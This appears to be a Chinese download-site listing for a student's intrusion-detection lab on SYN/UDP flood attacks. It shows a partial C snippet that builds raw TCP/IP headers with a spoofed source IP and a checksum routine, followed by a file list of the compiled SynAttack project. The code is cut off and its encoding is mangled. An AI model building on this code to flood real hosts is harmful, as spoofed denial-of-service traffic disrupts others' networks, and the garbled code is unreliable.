資源簡介
編譯原理udp flood 攻擊實驗報告
代碼片段和文件信息
#include??
#include??
#include??
#include?
#include?
#include?
#pragma?comment(lib“ws2_32“)?
#pragma?comment(lib“wsock32“)?
#define?SEQ?0x28376839?
#define?FAKE_IP?“111.111.111.111“?//?假源地址IP
USHORT?checksum(USHORT?*buffer?int?size);?
int?flood();?
typedef?struct?tcphdr?
{?
????USHORT?th_sport;????????????????????????//?16位源端口
????USHORT?th_dport;????????????????????????//?16目的端口
????unsigned?int?th_seq;????????????????????//?32位序列號
????unsigned?int?th_ack;????????????????????//?32位確認號
????unsigned?char?th_lenres;????????????????//?4位首部長度/6位保留字
????unsigned?char?th_flag;??????????????????//?6位標志位
????USHORT?th_win;??????????????????????????//?16位窗口大小
????USHORT?th_sum;??????????????????????????//?16位校驗和
????USHORT?th_urp;??????????????????????????//?16位緊急數據偏移量
}TCP_HEADER;????????????????????????????????//?TCP頭部結構
typedef?struct?iphdr?
{?
????unsigned?char?h_verlen;????????????//?4位首部長度+4位IP版本號
????unsigned?char?tos;?????????????????//?8位服務類型TOS?
????unsigned?short?total_len;??????????//?16位總長度
????unsigned?short?ident;??????????????//?16位標識
????unsigned?short?frag_and_flags;?????//?3位標志位+13報片偏移
????unsigned?char?ttl;?????????????????//?8位生存時間
????unsigned?char?proto;???????????????//?8位協議
????unsigned?short?checksum;???????????//?16位IP首部校驗和
????unsigned?int?sourceIP;?????????????//?32位源IP地址
????unsigned?int?destIP;???????????????//?32位目的IP地址
}IP_HEADER;????????????????????????????//?IP頭部結構
///////////////////////////////////////////////////////////////////////////////////
//
//由于TCP首部中不包含源地址與目標地址等信息,為了保證TCP校驗的有
//效性,在進行TCP校驗和的計算時,需要增加一個TCP偽首部的校驗和。
//
///////////////////////////////////////////////////////////////////////////////////
struct?
{?
????unsigned?long?saddr;?????????????????//?源地址
????unsigned?long?daddr;?????????????????//?目的地址
????char?mbz;????????????????????????????//?置空
????char?ptcl;???????????????????????????//?協議類型
????unsigned?short?tcpl;?????????????????//?TCP長度
}PSD_HEADER;?
WSADATA?wsaData;?
SOCKET?sockMain?=?(SOCKET)?NULL;?
int?ErrorCode=0flag=trueTimeOut=2000FakeIpNetFakeIpHostdataSize=0SendSEQ=0;?
unsigned?short?activPort=40000;?
struct?sockaddr_in?sockAddr;?
TCP_HEADER?tcpheader;?
IP_HEADER?ipheader;?
char?sendBuf[128];?
////////////////////////////////////////////////////////////////////////////////////////////
//
//?IP校驗和的計算方法是:首先將IP首部的校驗和字段設為0(IP_HEADER.checksum=0)
//?然后計算整個IP首部(包括選項)的二進制反碼的和。
//
////////////////////////////////////////////////////////////////////////////////////////////
USHORT?checksum(USHORT?*buffer?int?size)?
{?
????unsigned?long?cksum=0;?
????while(size?>1)?{?
????????cksum+=*buffer++;?
????????size-=sizeof(USHORT);?
????}?
????if(size)?cksum+=*(UCHAR*)buffer;?
????cksum=(cksum?>>?16)+(cksum&0xffff);?
????cksum+=(cksum?>>16);?
????return?(USHORT)(~cksum);?
}?
int?main()?
{
????std::string?portStr?ipStr;
????std::cout<<“輸入IP地址:“<
?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2013-05-18?17:26??潘俊100410527入侵檢測\
?????目錄???????????0??2013-05-18?17:26??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\
?????目錄???????????0??2013-05-18?17:26??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\
?????文件???????44274??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\CL.read.1.tlog
?????文件?????????338??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\CL.write.1.tlog
?????文件??????571904??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe
?????文件?????????406??2013-05-15?21:18??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe.em
?????文件?????????472??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe.em
?????文件?????????381??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe.intermediate.manifest
?????文件?????1544912??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.ilk
?????文件??????????45??2013-05-18?15:13??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.lastbuildstate
?????文件?????????838??2013-05-18?15:13??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.log
?????文件??????350711??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.obj
?????文件?????????214??2013-05-15?21:18??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack_manifest.rc
?????文件????????1260??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\cl.command.1.tlog
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件????????2610??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件????????6874??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件?????????910??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\li
?????文件?????????682??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\mt.command.1.tlog
?????文件?????????506??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\mt.read.1.tlog
?????文件?????????202??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\mt.write.1.tlog
?????文件?????????870??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\rc.command.1.tlog
?????文件?????????450??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\rc.read.1.tlog
?????文件?????????362??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\rc.write.1.tlog
?????文件??????814080??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\vc100.idb
............此處省略19個文件信息
- 上一篇:廣和通G510芯片資料
- 下一篇:IEEE 802.11-2012最新完整版
評論
共有 條評論